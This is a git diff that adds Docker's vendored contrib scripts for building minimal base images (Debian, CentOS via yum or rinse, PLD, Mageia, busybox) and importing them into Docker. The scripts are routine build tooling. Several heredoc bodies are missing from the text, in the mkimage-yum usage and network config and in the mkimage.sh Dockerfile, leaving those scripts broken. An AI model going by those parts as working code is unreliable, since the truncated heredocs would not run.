'force-unsafe-io' | sudo tee etc/dpkg/dpkg.cfg.d/02apt-speedup > /dev/null + # we have this wrapped up in an "if" because the "force-unsafe-io" + # option was added in dpkg 1.15.8.6 + # (see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584254#82), + # and ubuntu lucid/10.04 only has 1.15.5.6 + fi + + # we want to effectively run "apt-get clean" after every install to keep images small (see output of "apt-get clean -s" for context) + { + aptGetClean='"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true";' + echo "DPkg::Post-Invoke { ${aptGetClean} };" + echo "APT::Update::Post-Invoke { ${aptGetClean} };" + echo 'Dir::Cache::pkgcache ""; Dir::Cache::srcpkgcache "";' + } | sudo tee etc/apt/apt.conf.d/no-cache > /dev/null + + # and remove the translations, too + echo 'Acquire::Languages "none";' | sudo tee etc/apt/apt.conf.d/no-languages > /dev/null + + # helpful undo lines for each the above tweaks (for lack of a better home to keep track of them): + # rm /usr/sbin/policy-rc.d + # rm /sbin/initctl; dpkg-divert --rename --remove /sbin/initctl + # rm /etc/dpkg/dpkg.cfg.d/02apt-speedup + # rm /etc/apt/apt.conf.d/no-cache + # rm /etc/apt/apt.conf.d/no-languages + + if [ -z "$skipDetection" ]; then + # see also rudimentary platform detection in hack/install.sh + lsbDist='' + if [ -r etc/lsb-release ]; then + lsbDist="$(. etc/lsb-release && echo "$DISTRIB_ID")" + fi + if [ -z "$lsbDist" ] && [ -r etc/debian_version ]; then + lsbDist='Debian' + fi + + case "$lsbDist" in + Debian) + # add the updates and security repositories + if [ "$suite" != "$debianUnstable" -a "$suite" != 'unstable' ]; then + # ${suite}-updates only applies to non-unstable + sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list + + # same for security updates + echo "deb http://security.debian.org/ $suite/updates main" | sudo tee -a etc/apt/sources.list > /dev/null + fi + ;; + Ubuntu) + # add the universe, updates, and security repositories + sudo sed -i " + s/ $suite main$/ $suite main universe/; p; + s/ $suite main/ ${suite}-updates main/; p; + s/ $suite-updates main/ ${suite}-security main/ + " etc/apt/sources.list + ;; + Tanglu) + # add the updates repository + if [ "$suite" = "$tangluLatest" ]; then + # ${suite}-updates only applies to stable Tanglu versions + sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list + fi + ;; + SteamOS) + # add contrib and non-free + sudo sed -i "s/ $suite main$/ $suite main contrib non-free/" etc/apt/sources.list + ;; + esac + fi + + # make sure our packages lists are as up to date as we can get them + sudo chroot . apt-get update + sudo chroot . apt-get dist-upgrade -y +fi + +if [ "$justTar" ]; then + # create the tarball file so it has the right permissions (ie, not root) + touch "$repo" + + # fill the tarball + sudo tar --numeric-owner -caf "$repo" . +else + # create the image (and tag $repo:$suite) + sudo tar --numeric-owner -c . | $docker import - $repo:$suite + + # test the image + $docker run -i -t $repo:$suite echo success + + if [ -z "$skipDetection" ]; then + case "$lsbDist" in + Debian) + if [ "$suite" = "$debianStable" -o "$suite" = 'stable' ] && [ -r etc/debian_version ]; then + # tag latest + $docker tag $repo:$suite $repo:latest + + if [ -r etc/debian_version ]; then + # tag the specific debian release version (which is only reasonable to tag on debian stable) + ver=$(cat etc/debian_version) + $docker tag $repo:$suite $repo:$ver + fi + fi + ;; + Ubuntu) + if [ "$suite" = "$ubuntuLatestLTS" ]; then + # tag latest + $docker tag $repo:$suite $repo:latest + fi + if [ -r etc/lsb-release ]; then + lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" + if [ "$lsbRelease" ]; then + # tag specific Ubuntu version number, if available (12.04, etc.) + $docker tag $repo:$suite $repo:$lsbRelease + fi + fi + ;; + Tanglu) + if [ "$suite" = "$tangluLatest" ]; then + # tag latest + $docker tag $repo:$suite $repo:latest + fi + if [ -r etc/lsb-release ]; then + lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" + if [ "$lsbRelease" ]; then + # tag specific Tanglu version number, if available (1.0, 2.0, etc.) + $docker tag $repo:$suite $repo:$lsbRelease + fi + fi + ;; + SteamOS) + if [ -r etc/lsb-release ]; then + lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" + if [ "$lsbRelease" ]; then + # tag specific SteamOS version number, if available (1.0, 2.0, etc.) + $docker tag $repo:$suite $repo:$lsbRelease + fi + fi + ;; + esac + fi +fi + +# cleanup +cd "$returnTo" +sudo rm -rf "$target" diff --git a/vendor/github.com/docker/docker/contrib/mkimage-pld.sh b/vendor/github.com/docker/docker/contrib/mkimage-pld.sh new file mode 100755 index 0000000000..615c2030a3 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-pld.sh @@ -0,0 +1,73 @@ +#!/bin/sh +# +# Generate a minimal filesystem for PLD Linux and load it into the local docker as "pld". +# https://www.pld-linux.org/packages/docker +# +set -e + +if [ "$(id -u)" != "0" ]; then + echo >&2 "$0: requires root" + exit 1 +fi + +image_name=pld + +tmpdir=$(mktemp -d ${TMPDIR:-/var/tmp}/pld-docker-XXXXXX) +root=$tmpdir/rootfs +install -d -m 755 $root + +# to clean up: +docker rmi $image_name || : + +# build +rpm -r $root --initdb + +set +e +install -d $root/dev/pts +mknod $root/dev/random c 1 8 -m 644 +mknod $root/dev/urandom c 1 9 -m 644 +mknod $root/dev/full c 1 7 -m 666 +mknod $root/dev/null c 1 3 -m 666 +mknod $root/dev/zero c 1 5 -m 666 +mknod $root/dev/console c 5 1 -m 660 +set -e + +poldek -r $root --up --noask -u \ + --noignore \ + -O 'rpmdef=_install_langs C' \ + -O 'rpmdef=_excludedocs 1' \ + vserver-packages \ + bash iproute2 coreutils grep poldek + +# fix netsharedpath, so containers would be able to install when some paths are mounted +sed -i -e 's;^#%_netsharedpath.*;%_netsharedpath /dev/shm:/sys:/proc:/dev:/etc/hostname;' $root/etc/rpm/macros + +# no need for alternatives +poldek-config -c $root/etc/poldek/poldek.conf ignore systemd-init + +# this makes initscripts to believe network is up +touch $root/var/lock/subsys/network + +# cleanup large optional packages +remove_packages="ca-certificates" +for pkg in $remove_packages; do + rpm -r $root -q $pkg && rpm -r $root -e $pkg --nodeps +done + +# cleanup more +rm -v $root/etc/ld.so.cache +rm -rfv $root/var/cache/hrmib/* +rm -rfv $root/usr/share/man/man?/* +rm -rfv $root/usr/share/locale/*/ +rm -rfv $root/usr/share/help/*/ +rm -rfv $root/usr/share/doc/* +rm -rfv $root/usr/src/examples/* +rm -rfv $root/usr/share/pixmaps/* + +# and import +tar --numeric-owner --xattrs --acls -C $root -c . | docker import - $image_name + +# and test +docker run -i -u root $image_name /bin/echo Success. + +rm -r $tmpdir diff --git a/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh b/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh new file mode 100755 index 0000000000..7e0935062f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh @@ -0,0 +1,123 @@ +#!/usr/bin/env bash +# +# Create a base CentOS Docker image. + +# This script is useful on systems with rinse available (e.g., +# building a CentOS image on Debian). See contrib/mkimage-yum.sh for +# a way to build CentOS images on systems with yum installed. + +set -e + +echo >&2 +echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/rinse' +echo >&2 + +repo="$1" +distro="$2" +mirror="$3" + +if [ ! "$repo" ] || [ ! "$distro" ]; then + self="$(basename $0)" + echo >&2 "usage: $self repo distro [mirror]" + echo >&2 + echo >&2 " ie: $self username/centos centos-5" + echo >&2 " $self username/centos centos-6" + echo >&2 + echo >&2 " ie: $self username/slc slc-5" + echo >&2 " $self username/slc slc-6" + echo >&2 + echo >&2 " ie: $self username/centos centos-5 http://vault.centos.org/5.8/os/x86_64/CentOS/" + echo >&2 " $self username/centos centos-6 http://vault.centos.org/6.3/os/x86_64/Packages/" + echo >&2 + echo >&2 'See /etc/rinse for supported values of "distro" and for examples of' + echo >&2 ' expected values of "mirror".' + echo >&2 + echo >&2 'This script is tested to work with the original upstream version of rinse,' + echo >&2 ' found at http://www.steve.org.uk/Software/rinse/ and also in Debian at' + echo >&2 ' http://packages.debian.org/wheezy/rinse -- as always, YMMV.' + echo >&2 + exit 1 +fi + +target="${TMPDIR:-/var/tmp}/docker-rootfs-rinse-$distro-$$-$RANDOM" + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" +returnTo="$(pwd -P)" + +rinseArgs=( --arch amd64 --distribution "$distro" --directory "$target" ) +if [ "$mirror" ]; then + rinseArgs+=( --mirror "$mirror" ) +fi + +set -x + +mkdir -p "$target" + +sudo rinse "${rinseArgs[@]}" + +cd "$target" + +# rinse fails a little at setting up /dev, so we'll just wipe it out and create our own +sudo rm -rf dev +sudo mkdir -m 755 dev +( + cd dev + sudo ln -sf /proc/self/fd ./ + sudo mkdir -m 755 pts + sudo mkdir -m 1777 shm + sudo mknod -m 600 console c 5 1 + sudo mknod -m 600 initctl p + sudo mknod -m 666 full c 1 7 + sudo mknod -m 666 null c 1 3 + sudo mknod -m 666 ptmx c 5 2 + sudo mknod -m 666 random c 1 8 + sudo mknod -m 666 tty c 5 0 + sudo mknod -m 666 tty0 c 4 0 + sudo mknod -m 666 urandom c 1 9 + sudo mknod -m 666 zero c 1 5 +) + +# effectively: febootstrap-minimize --keep-zoneinfo --keep-rpmdb --keep-services "$target" +# locales +sudo rm -rf usr/{{lib,share}/locale,{lib,lib64}/gconv,bin/localedef,sbin/build-locale-archive} +# docs and man pages +sudo rm -rf usr/share/{man,doc,info,gnome/help} +# cracklib +sudo rm -rf usr/share/cracklib +# i18n +sudo rm -rf usr/share/i18n +# yum cache +sudo rm -rf var/cache/yum +sudo mkdir -p --mode=0755 var/cache/yum +# sln +sudo rm -rf sbin/sln +# ldconfig +#sudo rm -rf sbin/ldconfig +sudo rm -rf etc/ld.so.cache var/cache/ldconfig +sudo mkdir -p --mode=0755 var/cache/ldconfig + +# allow networking init scripts inside the container to work without extra steps +echo 'NETWORKING=yes' | sudo tee etc/sysconfig/network > /dev/null + +# to restore locales later: +# yum reinstall glibc-common + +version= +if [ -r etc/redhat-release ]; then + version="$(sed -E 's/^[^0-9.]*([0-9.]+).*$/\1/' etc/redhat-release)" +elif [ -r etc/SuSE-release ]; then + version="$(awk '/^VERSION/ { print $3 }' etc/SuSE-release)" +fi + +if [ -z "$version" ]; then + echo >&2 "warning: cannot autodetect OS version, using $distro as tag" + sleep 20 + version="$distro" +fi + +sudo tar --numeric-owner -c . | docker import - $repo:$version + +docker run -i -t $repo:$version echo success + +cd "$returnTo" +sudo rm -rf "$target" diff --git a/vendor/github.com/docker/docker/contrib/mkimage-yum.sh b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh new file mode 100755 index 0000000000..29da170480 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh @@ -0,0 +1,136 @@ +#!/usr/bin/env bash +# +# Create a base CentOS Docker image. +# +# This script is useful on systems with yum installed (e.g., building +# a CentOS image on CentOS). See contrib/mkimage-rinse.sh for a way +# to build CentOS images on other systems. + +set -e + +usage() { + cat < +OPTIONS: + -p "" The list of packages to install in the container. + The default is blank. + -g "" The groups of packages to install in the container. + The default is "Core". + -y The path to the yum config to install packages from. The + default is /etc/yum.conf for Centos/RHEL and /etc/dnf/dnf.conf for Fedora +EOOPTS + exit 1 +} + +# option defaults +yum_config=/etc/yum.conf +if [ -f /etc/dnf/dnf.conf ] && command -v dnf &> /dev/null; then + yum_config=/etc/dnf/dnf.conf + alias yum=dnf +fi +install_groups="Core" +while getopts ":y:p:g:h" opt; do + case $opt in + y) + yum_config=$OPTARG + ;; + h) + usage + ;; + p) + install_packages="$OPTARG" + ;; + g) + install_groups="$OPTARG" + ;; + \?) + echo "Invalid option: -$OPTARG" + usage + ;; + esac +done +shift $((OPTIND - 1)) +name=$1 + +if [[ -z $name ]]; then + usage +fi + +target=$(mktemp -d --tmpdir $(basename $0).XXXXXX) + +set -x + +mkdir -m 755 "$target"/dev +mknod -m 600 "$target"/dev/console c 5 1 +mknod -m 600 "$target"/dev/initctl p +mknod -m 666 "$target"/dev/full c 1 7 +mknod -m 666 "$target"/dev/null c 1 3 +mknod -m 666 "$target"/dev/ptmx c 5 2 +mknod -m 666 "$target"/dev/random c 1 8 +mknod -m 666 "$target"/dev/tty c 5 0 +mknod -m 666 "$target"/dev/tty0 c 4 0 +mknod -m 666 "$target"/dev/urandom c 1 9 +mknod -m 666 "$target"/dev/zero c 1 5 + +# amazon linux yum will fail without vars set +if [ -d /etc/yum/vars ]; then + mkdir -p -m 755 "$target"/etc/yum + cp -a /etc/yum/vars "$target"/etc/yum/ +fi + +if [[ -n "$install_groups" ]]; +then + yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \ + --setopt=group_package_types=mandatory -y groupinstall $install_groups +fi + +if [[ -n "$install_packages" ]]; +then + yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \ + --setopt=group_package_types=mandatory -y install $install_packages +fi + +yum -c "$yum_config" --installroot="$target" -y clean all + +cat > "$target"/etc/sysconfig/network <&2 "warning: cannot autodetect OS version, using '$name' as tag" + version=$name +fi + +tar --numeric-owner -c -C "$target" . | docker import - $name:$version + +docker run -i -t --rm $name:$version /bin/bash -c 'echo success' + +rm -rf "$target" diff --git a/vendor/github.com/docker/docker/contrib/mkimage.sh b/vendor/github.com/docker/docker/contrib/mkimage.sh new file mode 100755 index 0000000000..13298c8036 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage.sh @@ -0,0 +1,128 @@ +#!/usr/bin/env bash +set -e + +mkimg="$(basename "$0")" + +usage() { + echo >&2 "usage: $mkimg [-d dir] [-t tag] [--compression algo| --no-compression] script [script-args]" + echo >&2 " ie: $mkimg -t someuser/debian debootstrap --variant=minbase jessie" + echo >&2 " $mkimg -t someuser/ubuntu debootstrap --include=ubuntu-minimal --components=main,universe trusty" + echo >&2 " $mkimg -t someuser/busybox busybox-static" + echo >&2 " $mkimg -t someuser/centos:5 rinse --distribution centos-5" + echo >&2 " $mkimg -t someuser/mageia:4 mageia-urpmi --version=4" + echo >&2 " $mkimg -t someuser/mageia:4 mageia-urpmi --version=4 --mirror=http://somemirror/" + echo >&2 " $mkimg -t someuser/solaris solaris" + exit 1 +} + +scriptDir="$(dirname "$(readlink -f "$BASH_SOURCE")")/mkimage" + +os= +os=$(uname -o) + +# set up path to gnu tools if solaris +[[ $os == "Solaris" ]] && export PATH=/usr/gnu/bin:$PATH +# TODO check for gnu-tar, gnu-getopt + +# TODO requires root/sudo due to some pkg operations. sigh. +[[ $os == "Solaris" && $EUID != "0" ]] && echo >&2 "image create on Solaris requires superuser privilege" + +optTemp=$(getopt --options '+d:t:c:hC' --longoptions 'dir:,tag:,compression:,no-compression,help' --name "$mkimg" -- "$@") +eval set -- "$optTemp" +unset optTemp + +dir= +tag= +compression="auto" +while true; do + case "$1" in + -d|--dir) dir="$2" ; shift 2 ;; + -t|--tag) tag="$2" ; shift 2 ;; + --compression) compression="$2" ; shift 2 ;; + --no-compression) compression="none" ; shift 1 ;; + -h|--help) usage ;; + --) shift ; break ;; + esac +done + +script="$1" +[ "$script" ] || usage +shift + +if [ "$compression" == 'auto' ] || [ -z "$compression" ] +then + compression='xz' +fi + +[ "$compression" == 'none' ] && compression='' + +if [ ! -x "$scriptDir/$script" ]; then + echo >&2 "error: $script does not exist or is not executable" + echo >&2 " see $scriptDir for possible scripts" + exit 1 +fi + +# don't mistake common scripts like .febootstrap-minimize as image-creators +if [[ "$script" == .* ]]; then + echo >&2 "error: $script is a script helper, not a script" + echo >&2 " see $scriptDir for possible scripts" + exit 1 +fi + +delDir= +if [ -z "$dir" ]; then + dir="$(mktemp -d ${TMPDIR:-/var/tmp}/docker-mkimage.XXXXXXXXXX)" + delDir=1 +fi + +rootfsDir="$dir/rootfs" +( set -x; mkdir -p "$rootfsDir" ) + +# pass all remaining arguments to $script +"$scriptDir/$script" "$rootfsDir" "$@" + +# Docker mounts tmpfs at /dev and procfs at /proc so we can remove them +rm -rf "$rootfsDir/dev" "$rootfsDir/proc" +mkdir -p "$rootfsDir/dev" "$rootfsDir/proc" + +# make sure /etc/resolv.conf has something useful in it +mkdir -p "$rootfsDir/etc" +cat > "$rootfsDir/etc/resolv.conf" <<'EOF' +nameserver 8.8.8.8 +nameserver 8.8.4.4 +EOF + +tarFile="$dir/rootfs.tar${compression:+.$compression}" +touch "$tarFile" + +( + set -x + tar --numeric-owner --create --auto-compress --file "$tarFile" --directory "$rootfsDir" --transform='s,^./,,' . +) + +echo >&2 "+ cat > '$dir/Dockerfile'" +cat > "$dir/Dockerfile" <> "$dir/Dockerfile" ) + break + fi +done + +( set -x; rm -rf "$rootfsDir" ) + +if [ "$tag" ]; then + ( set -x; docker build -t "$tag" "$dir" ) +elif [ "$delDir" ]; then + # if we didn't specify a tag and we're going to delete our dir, let's just build an untagged image so that we did _something_ + ( set -x; docker build "$dir" ) +fi + +if [ "$delDir" ]; then + ( set -x; rm -rf "$dir" ) +fi diff --git a/vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize b/vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize new file mode 100755 index 0000000000..7749e63fb0 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize @@ -0,0 +1,28 @@ +#!/usr/bin/env bash +set -e + +rootfsDir="$1" +shift + +( + cd "$rootfsDir" + + # effectively: febootstrap-minimize --keep-zoneinfo --keep-rpmdb --keep-services "$target" + # locales + rm -rf usr/{{lib,share}/locale,{lib,lib64}/gconv,bin/localedef,sbin/build-locale-archive} + # docs and man pages + rm -rf usr/share/{man,doc,info,gnome/help} + # cracklib + rm -rf usr/share/cracklib + # i18n + rm -rf usr/share/i18n + # yum cache + rm -rf var/cache/yum + mkdir -p --mode=0755 var/cache/yum + # sln + rm -rf sbin/sln + # ldconfig + #rm -rf sbin/ldconfig + rm -rf etc/ld.so.cache var/cache/ldconfig + mkdir -p --mode=0755 var/cache/ldconfig +) diff --git a/vendor/github.com/docker/docker/contrib/mkimage/busybox-static b/vendor/github.com/docker/docker/contrib/mkimage/busybox-static new file mode 100755 index 0000000000..e15322b49d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/busybox-static @@ -0,0 +1,34 @@ +#!/usr/bin/env bash +set -e + +rootfsDir="$1" +shift + +busybox="$(which busybox 2>/dev/null || true)" +if [ -z "$busybox" ]; then + echo >&2 'error: busybox: not found' + echo >&2 ' install it with your distribution "busybox-static" package' + exit 1 +fi +if ! ldd "$busybox" 2>&1 | grep -q 'not a dynamic executable'; then + echo >&2 "error: '$busybox' appears to be a dynamic executable" + echo >&2 ' you should install your distribution "busybox-static" package instead' + exit 1 +fi + +mkdir -p "$rootfsDir/bin" +rm -f "$rootfsDir/bin/busybox" # just in case +cp "$busybox" "$rootfsDir/bin/busybox" + +( + cd "$rootfsDir" + + IFS=$'\n' + modules=( $(bin/busybox --list-modules) ) + unset IFS + + for module in "${modules[@]}"; do + mkdir -p "$(dirname "$module")" + ln -sf /bin/busybox "$module" + done +) diff --git a/vendor/github.com/docker/docker/contrib/mkimage/debootstrap b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap new file mode 100755 index 0000000000..7d56d8ea9f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap @@ -0,0 +1,226 @@ +#!/usr/bin/env bash +set -e + +rootfsDir="$1" +shift + +# we have to do a little fancy footwork to make sure "rootfsDir" becomes the second non-option argument to debootstrap + +before=() +while [ $# -gt 0 ] && [[ "$1" == -* ]]; do + before+=( "$1" ) + shift +done + +suite="$1" +shift + +# get path to "chroot" in our current PATH +chrootPath="$(type -P chroot)" +rootfs_chroot() { + # "chroot" doesn't set PATH, so we need to set it explicitly to something our new debootstrap chroot can use appropriately! + + # set PATH and chroot away! + PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin' \ + "$chrootPath" "$rootfsDir" "$@" +} + +# allow for DEBOOTSTRAP=qemu-debootstrap ./mkimage.sh ... +: ${DEBOOTSTRAP:=debootstrap} + +( + set -x + $DEBOOTSTRAP "${before[@]}" "$suite" "$rootfsDir" "$@" +) + +# now for some Docker-specific tweaks + +# prevent init scripts from running during install/update +echo >&2 "+ echo exit 101 > '$rootfsDir/usr/sbin/policy-rc.d'" +cat > "$rootfsDir/usr/sbin/policy-rc.d" <<-'EOF' + #!/bin/sh + + # For most Docker users, "apt-get install" only happens during "docker build", + # where starting services doesn't work and often fails in humorous ways. This + # prevents those failures by stopping the services from attempting to start. + + exit 101 +EOF +chmod +x "$rootfsDir/usr/sbin/policy-rc.d" + +# prevent upstart scripts from running during install/update +( + set -x + rootfs_chroot dpkg-divert --local --rename --add /sbin/initctl + cp -a "$rootfsDir/usr/sbin/policy-rc.d" "$rootfsDir/sbin/initctl" + sed -i 's/^exit.*/exit 0/' "$rootfsDir/sbin/initctl" +) + +# shrink a little, since apt makes us cache-fat (wheezy: ~157.5MB vs ~120MB) +( set -x; rootfs_chroot apt-get clean ) + +# this file is one APT creates to make sure we don't "autoremove" our currently +# in-use kernel, which doesn't really apply to debootstraps/Docker images that +# don't even have kernels installed +rm -f "$rootfsDir/etc/apt/apt.conf.d/01autoremove-kernels" + +# Ubuntu 10.04 sucks... :) +if strings "$rootfsDir/usr/bin/dpkg" | grep -q unsafe-io; then + # force dpkg not to call sync() after package extraction (speeding up installs) + echo >&2 "+ echo force-unsafe-io > '$rootfsDir/etc/dpkg/dpkg.cfg.d/docker-apt-speedup'" + cat > "$rootfsDir/etc/dpkg/dpkg.cfg.d/docker-apt-speedup" <<-'EOF' + # For most Docker users, package installs happen during "docker build", which + # doesn't survive power loss and gets restarted clean afterwards anyhow, so + # this minor tweak gives us a nice speedup (much nicer on spinning disks, + # obviously). + + force-unsafe-io + EOF +fi + +if [ -d "$rootfsDir/etc/apt/apt.conf.d" ]; then + # _keep_ us lean by effectively running "apt-get clean" after every install + aptGetClean='"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true";' + echo >&2 "+ cat > '$rootfsDir/etc/apt/apt.conf.d/docker-clean'" + cat > "$rootfsDir/etc/apt/apt.conf.d/docker-clean" <<-EOF + # Since for most Docker users, package installs happen in "docker build" steps, + # they essentially become individual layers due to the way Docker handles + # layering, especially using CoW filesystems. What this means for us is that + # the caches that APT keeps end up just wasting space in those layers, making + # our layers unnecessarily large (especially since we'll normally never use + # these caches again and will instead just "docker build" again and make a brand + # new image). + + # Ideally, these would just be invoking "apt-get clean", but in our testing, + # that ended up being cyclic and we got stuck on APT's lock, so we get this fun + # creation that's essentially just "apt-get clean". + DPkg::Post-Invoke { ${aptGetClean} }; + APT::Update::Post-Invoke { ${aptGetClean} }; + + Dir::Cache::pkgcache ""; + Dir::Cache::srcpkgcache ""; + + # Note that we do realize this isn't the ideal way to do this, and are always + # open to better suggestions (https://github.com/docker/docker/issues). + EOF + + # remove apt-cache translations for fast "apt-get update" + echo >&2 "+ echo Acquire::Languages 'none' > '$rootfsDir/etc/apt/apt.conf.d/docker-no-languages'" + cat > "$rootfsDir/etc/apt/apt.conf.d/docker-no-languages" <<-'EOF' + # In Docker, we don't often need the "Translations" files, so we're just wasting + # time and space by downloading them, and this inhibits that. For users that do + # need them, it's a simple matter to delete this file and "apt-get update". :) + + Acquire::Languages "none"; + EOF + + echo >&2 "+ echo Acquire::GzipIndexes 'true' > '$rootfsDir/etc/apt/apt.conf.d/docker-gzip-indexes'" + cat > "$rootfsDir/etc/apt/apt.conf.d/docker-gzip-indexes" <<-'EOF' + # Since Docker users using "RUN apt-get update && apt-get install -y ..." in + # their Dockerfiles don't go delete the lists files afterwards, we want them to + # be as small as possible on-disk, so we explicitly request "gz" versions and + # tell Apt to keep them gzipped on-disk. + + # For comparison, an "apt-get update" layer without this on a pristine + # "debian:wheezy" base image was "29.88 MB", where with this it was only + # "8.273 MB". + + Acquire::GzipIndexes "true"; + Acquire::CompressionTypes::Order:: "gz"; + EOF + + # update "autoremove" configuration to be aggressive about removing suggests deps that weren't manually installed + echo >&2 "+ echo Apt::AutoRemove::SuggestsImportant 'false' > '$rootfsDir/etc/apt/apt.conf.d/docker-autoremove-suggests'" + cat > "$rootfsDir/etc/apt/apt.conf.d/docker-autoremove-suggests" <<-'EOF' + # Since Docker users are looking for the smallest possible final images, the + # following emerges as a very common pattern: + + # RUN apt-get update \ + # && apt-get install -y \ + # && \ + # && apt-get purge -y --auto-remove + + # By default, APT will actually _keep_ packages installed via Recommends or + # Depends if another package Suggests them, even and including if the package + # that originally caused them to be installed is removed. Setting this to + # "false" ensures that APT is appropriately aggressive about removing the + # packages it added. + + # https://aptitude.alioth.debian.org/doc/en/ch02s05s05.html#configApt-AutoRemove-SuggestsImportant + Apt::AutoRemove::SuggestsImportant "false"; + EOF +fi + +if [ -z "$DONT_TOUCH_SOURCES_LIST" ]; then + # tweak sources.list, where appropriate + lsbDist= + if [ -z "$lsbDist" -a -r "$rootfsDir/etc/os-release" ]; then + lsbDist="$(. "$rootfsDir/etc/os-release" && echo "$ID")" + fi + if [ -z "$lsbDist" -a -r "$rootfsDir/etc/lsb-release" ]; then + lsbDist="$(. "$rootfsDir/etc/lsb-release" && echo "$DISTRIB_ID")" + fi + if [ -z "$lsbDist" -a -r "$rootfsDir/etc/debian_version" ]; then + lsbDist='Debian' + fi + # normalize to lowercase for easier matching + lsbDist="$(echo "$lsbDist" | tr '[:upper:]' '[:lower:]')" + case "$lsbDist" in + debian) + # updates and security! + if [ "$suite" != 'sid' -a "$suite" != 'unstable' ]; then + ( + set -x + sed -i " + p; + s/ $suite / ${suite}-updates / + " "$rootfsDir/etc/apt/sources.list" + echo "deb http://security.debian.org $suite/updates main" >> "$rootfsDir/etc/apt/sources.list" + ) + fi + ;; + ubuntu) + # add the updates and security repositories + ( + set -x + sed -i " + p; + s/ $suite / ${suite}-updates /; p; + s/ $suite-updates / ${suite}-security / + " "$rootfsDir/etc/apt/sources.list" + ) + ;; + tanglu) + # add the updates repository + if [ "$suite" != 'devel' ]; then + ( + set -x + sed -i " + p; + s/ $suite / ${suite}-updates / + " "$rootfsDir/etc/apt/sources.list" + ) + fi + ;; + steamos) + # add contrib and non-free if "main" is the only component + ( + set -x + sed -i "s/ $suite main$/ $suite main contrib non-free/" "$rootfsDir/etc/apt/sources.list" + ) + ;; + esac +fi + +( + set -x + + # make sure we're fully up-to-date + rootfs_chroot sh -xc 'apt-get update && apt-get dist-upgrade -y' + + # delete all the apt list files since they're big and get stale quickly + rm -rf "$rootfsDir/var/lib/apt/lists"/* + # this forces "apt-get update" in dependent images, which is also good + + mkdir "$rootfsDir/var/lib/apt/lists/partial" # Lucid... "E: Lists directory /var/lib/apt/lists/partial is missing." +) diff --git a/vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi b/vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi new file mode 100755 index 0000000000..93fb289cac --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi @@ -0,0 +1,61 @@ +#!/usr/bin/env bash +# +# Needs to be run from Mageia 4 or greater for kernel support for docker. +# +# Mageia 4 does not have docker available in official repos, so please +# install and run the docker binary manually. +# +# Tested working versions are for Mageia 2 onwards (inc. cauldron). +# +set -e + +rootfsDir="$1" +shift + +optTemp=$(getopt --options '+v:,m:' --longoptions 'version:,mirror:' --name mageia-urpmi -- "$@") +eval set -- "$optTemp" +unset optTemp + +installversion= +mirror= +while true; do + case "$1" in + -v|--version) installversion="$2" ; shift 2 ;; + -m|--mirror) mirror="$2" ; shift 2 ;; + --) shift ; break ;; + esac +done + +if [ -z $installversion ]; then + # Attempt to match host version + if [ -r /etc/mageia-release ]; then + installversion="$(sed 's/^[^0-9\]*\([0-9.]\+\).*$/\1/' /etc/mageia-release)" + else + echo "Error: no version supplied and unable to detect host mageia version" + exit 1 + fi +fi + +if [ -z $mirror ]; then + # No mirror provided, default to mirrorlist + mirror="--mirrorlist https://mirrors.mageia.org/api/mageia.$installversion.x86_64.list" +fi + +( + set -x + urpmi.addmedia --distrib \ + $mirror \ + --urpmi-root "$rootfsDir" + urpmi basesystem-minimal urpmi \ + --auto \ + --no-suggests \ + --urpmi-root "$rootfsDir" \ + --root "$rootfsDir" +) + +"$(dirname "$BASH_SOURCE")/.febootstrap-minimize" "$rootfsDir" + +if [ -d "$rootfsDir/etc/sysconfig" ]; then + # allow networking init scripts inside the container to work without extra steps + echo 'NETWORKING=yes' > "$rootfsDir/etc/sysconfig/network" +fi diff --git a/vendor/github.com/docker/docker/contrib/mkimage/rinse b/vendor/github.com/docker/docker/contrib/mkimage/rinse new file mode 100755 index 0000000000..75eb4f0d9d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/rinse @@ -0,0 +1,25 @@ +#!/usr/bin/env bash +set -e + +rootfsDir="$1" +shift + +# specifying --arch below is safe because "$@" can override it and the "latest" one wins :) + +( + set -x + rinse --directory "$rootfsDir" --arch amd64 "$@" +) + +"$(dirname "$BASH_SOURCE")/.febootstrap-minimize" "$rootfsDir" + +if [ -d "$rootfsDir/etc/sysconfig" ]; then + # allow networking init scripts inside the container to work without extra steps + echo 'NETWORKING=yes' > "$rootfsDir/etc/sysconfig/network" +fi + +# make sure we're fully up-to-date, too +( + set -x + chroot "$rootfsDir" yum update -y +) diff --git a/vendor/github.com/docker/docker/contrib/mkimage/solaris b/vendor/github.com/docker/docker/contrib/mkimage/solaris new file mode 100755 index 0000000000..158970e69e --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/solaris @@ -0,0 +1,89 @@ 